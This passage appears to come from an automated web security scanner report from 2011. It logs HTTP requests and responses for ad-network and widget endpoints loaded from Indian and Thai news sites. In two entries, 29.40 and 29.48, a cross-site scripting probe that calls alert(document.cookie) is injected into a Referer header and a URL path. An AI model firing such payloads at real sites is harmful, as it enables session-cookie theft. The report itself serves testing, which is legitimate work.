GET /echo?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103283067&et=6680&burl=http%3A//adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH%3Bkvinvtype%3Ddoc%3Bkvexpandable%3D1%3Bkvdim%3Dfixed_bottom%3Bkvpid%3D1446945%3Bkvbw%3D0%3Bkvthrottle%3D0%3Bmisc%3D1315103282990%3Bkvrid%3D13232437d63581d89690132a84a8536a HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:35 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s1";

29.32. http://beacon.videoegg.com/init  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /init

Request

GET /init?rid=13232437d63581d89690132a84a8536a&prod=doc&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103276390&curtz=300&et=3&pb=indiatimes&si=TIMESOFINDIA_DOC_ROS&area=TIMESOFINDIA_DOC_ROS&dim=undefinedxundefined&ifrm=false&tech=bb&exp=1&pvid=13232437d657764a1b037f2aa42ffda9&loc=http%3A//timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:04:04 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

29.33. http://beacon.videoegg.com/initjs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /initjs

Request

GET /initjs?pb=indiatimes&si=INDIATIMES_US&area=INDIATIMES_US&dim=twig&loc=INDIATIMES_US_ROS_TWIG&pl=x&rid=1323243821bd3a2334d85d82f0661701&pvid=13232437d657764a1b037f2aa42ffda9&tech=admanager&curtime=1315103277595&curtz=300&ord=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:04:54 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s4";

29.34. http://beacon.videoegg.com/interact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /interact

Request

GET /interact?adid=1977158-1&area=INDIATIMES_US&ccid=1977158-1&dim=twig&int=invite_impression&loc=INDIATIMES_US_ROS_TWIG&pb=indiatimes&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&version=2&curtime=1315103301834&curtz=300&ord=10 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:20:10 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s1";

29.35. http://beacon.videoegg.com/invpos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /invpos

Request

GET /invpos?rid=1323243821bd3a2334d85d82f0661701&winwidth=1233&winheight=1037&adtop=3930&adleft=0&curtime=1315103280158&curtz=300&ord=2 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:11 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s2";

29.36. http://beacon.videoegg.com/pageloaded  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /pageloaded

Request

GET /pageloaded?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103285566&et=9179 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:11:58 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s4";

29.37. http://beacon.videoegg.com/tload  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /tload

Request

GET /tload?adtype=inv&area=INDIATIMES_US&ccid=1977158-1&fv=10.3.183&pb=indiatimes&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&totime=3020&version=2&curtime=1315103301836&curtz=300&ord=11 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:20:20 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

29.38. http://core.videoegg.com/eap/14533/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/14533/html/jstags.html

Request

GET /eap/14533/html/jstags.html?CCID=1977158-1&r=0.35500167799182236 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "c1285707168d4ed3b69ca3d4b048c0f4:1314219624"
Last-Modified: Wed, 24 Aug 2011 17:19:34 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:17:51 GMT
Content-Length: 1409
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...

29.39. http://core.videoegg.com/eap/latest/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/latest/html/jstags.html

Request

GET /eap/latest/html/jstags.html?CCID=1242772-1&r=0.7754915065597743 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "c1285707168d4ed3b69ca3d4b048c0f4:1314921396"
Last-Modified: Thu, 01 Sep 2011 23:42:44 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:08:07 GMT
Content-Length: 1409
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...

29.40. http://cricket.widgets.stats.com/ndtv_wc/miniscorecard_IPL2011.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cricket.widgets.stats.com
Path:   /ndtv_wc/miniscorecard_IPL2011.html

Request

GET /ndtv_wc/miniscorecard_IPL2011.html? HTTP/1.1
Host: cricket.widgets.stats.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 03 Aug 2011 06:30:44 GMT
Accept-Ranges: bytes
ETag: "ce93dedfa651cc1:9fd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1715
Date: Sun, 04 Sep 2011 02:36:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Cricket</title>
<script type="text/javascript" src="swfobject.js"></script>
<script language=javascript>
   fu
...[SNIP]...

29.41. http://d13.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/zpu.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d13.zedo.com
Path:   /OzoDB/cutils/R53_7_5/jsc/767/zpu.html

Request

GET /OzoDB/cutils/R53_7_5/jsc/767/zpu.html?n=767;f=1;z=2-110 HTTP/1.1
Host: d13.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFgeo=5386156; FFcat=1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15; FFad=0:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1340
Cache-Control: max-age=1843157
Expires: Sun, 25 Sep 2011 10:40:41 GMT
Date: Sun, 04 Sep 2011 02:41:24 GMT
Connection: close

<html>
<body>
<SCRIPT LANGUAGE="JavaScript">
var zcc7=new Array();var zcd9=0;
function zCF5(zcw1){
if(zcd9<1){
var zct3=''+window.location.search;var zcv4=new Array();var zcd3=zct3.indexOf(';l=')+1;
i
...[SNIP]...

29.42. http://d2.zedo.com/jsc/d2/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d2.zedo.com
Path:   /jsc/d2/ff2.html

Request

GET /jsc/d2/ff2.html?n=767;c=33/1;d=40;w=728;h=90 HTTP/1.1
Host: d2.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFgeo=5386156; FFMCap=2457900B1185,234056:933,196008|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; aps=2; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFad=0:1:0:0:0:0:0:0:0:0; FFcat=767,4,94:933,56,15:826,471,9:767,4,9:767,4,41:1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 12:11:53 GMT
ETag: "21e221f-a35-4aa4dd1a07440"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2613
Cache-Control: max-age=43286
Expires: Sun, 04 Sep 2011 14:45:23 GMT
Date: Sun, 04 Sep 2011 02:43:57 GMT
Connection: close

<!-- Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

29.43. http://d3.zedo.com/jsc/d3/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=1302;c=202;s=32;d=9;w=300;h=250;l=[INSERT_CLICK_TRACKER_MACRO] HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFad=0:0:0:0; FFcat=826,471,14:767,4,14:1185,589,14:305,825,15

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 12:13:46 GMT
ETag: "22022cd-a35-4aa4dd85cb280"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2613
Cache-Control: max-age=43935
Expires: Sun, 04 Sep 2011 14:49:49 GMT
Date: Sun, 04 Sep 2011 02:37:34 GMT
Connection: close

<!-- Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

29.44. http://ib.adnxs.com/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /click

Request

GET /click HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Invalid click uri
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:15:13 GMT
Content-Length: 140
Connection: close

<HTML><HEAD>
<TITLE>500 Invalid click uri</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

29.45. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media1.bangkokpost.com
Path:   /ads/Innity/030911TourismMalaysia728x90.html

Request

GET /ads/Innity/030911TourismMalaysia728x90.html HTTP/1.1
Host: media1.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; _cbclose62518=1; _uid62518=2BAEE501.1; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "807082134"
Last-Modified: Sat, 03 Sep 2011 08:01:02 GMT
Content-Length: 550
Connection: close
Date: Sun, 04 Sep 2011 02:52:05 GMT
Server: lighttpd/1.4.22

<!-- Ad Tag: Bangkok Post - TH_Tourism Malaysia - ASEAN_2011 -->
<script type="text/javascript">
innity_country = "TH";
innity_path = "/201105_3898/14638/";
innity_proxy = "proxy_35480";
innity_o
...[SNIP]...

29.46. http://mobile.indiatimes.com/pmswapdev_in/pmsdata.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.indiatimes.com
Path:   /pmswapdev_in/pmsdata.html

Request

GET /pmswapdev_in/pmsdata.html HTTP/1.1
Host: mobile.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:49 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7f DAV/2
Content-Length: 89
Cache-Control: max-age=0
Expires: Sun, 04 Sep 2011 04:15:49 GMT
Connection: close
Content-Type: text/html

<html><head>Sorry</head><body>SiteManager did not find the requested page!</body></html>

29.47. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030

Request

GET /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Set-Cookie: MMNBASEID=21041315109410696666828; expires=Fri, 02-Mar-2012 04:15:53 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 04:15:53 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=OZm4QWyytkVQabk8%2BxUQlZ1BCFDpF0B143hZyhKXo%2FeTnfJ8VeEqHnxEY%2BpUbrwvQIFkoA0GM1SvPSYjoQgbJKYRtHkp1DAwQ5ROrVD4dln85T%2F%2FEUg91j%2B0MlVv0Mb1JQodK%2FJd6qGFD1DK3JX8Vb63BN1AMN8G%2Fa%2FjaQ%3D%3D; expires=Fri, 02-Mar-2012 04:15:53 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=6bfe1cd82564d34693d98801e48e7812%5D%5D%3E%3E; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=62; path=/; domain=.martiniadnetwork.com; httponly
Vary: Accept-Encoding
Content-Length: 129
Connection: close
Content-Type: text/html


<script type="text/javascript">
document.write("<img src='" "' style='display: none;' height='1' width ='1' />");
</script>

29.48. http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976">1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551

Request

GET /action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http:/www.ndtv.com/article/india6a976"><img%20src=a%20onerror=alert(document.cookie)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142/pubclick/Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551 HTTP/1.1
Host: msite.martiniadnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Set-Cookie: MMNBASEID=21041315109410696666828; expires=Fri, 02-Mar-2012 04:15:54 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 04:15:54 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=FTuecWELObsEFBwHt3PeLtw8QkdlTIpMuIul9PNXbKLqg%2B5tq%2Fz4tjuh46vnDzKWanGbe2tEapCAtq0fQU2yobLzjvvHAhzaspIjfyci8u%2FX4wzYSZHe0fD7QlVf%2FDuk9ta2Ab2WwulLKtyb8hl%2F7pnsLHixXZ5gib8BFg%3D%3D; expires=Fri, 02-Mar-2012 04:15:54 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=6bfe1cd82564d34693d98801e48e7812%5D%5D%3E%3E; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=77; path=/; domain=.martiniadnetwork.com; httponly
Vary: Accept-Encoding
Content-Length: 129
Connection: close
Content-Type: text/html


<script type="text/javascript">
document.write("<img src='" "' style='display: none;' height='1' width ='1' />");
</script>

29.49. http://msite.martiniadnetwork.com/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Request

GET /index/?pid=1000000986802&sid=1000005169510&loc=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&rnd=890733501&ref=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142 HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
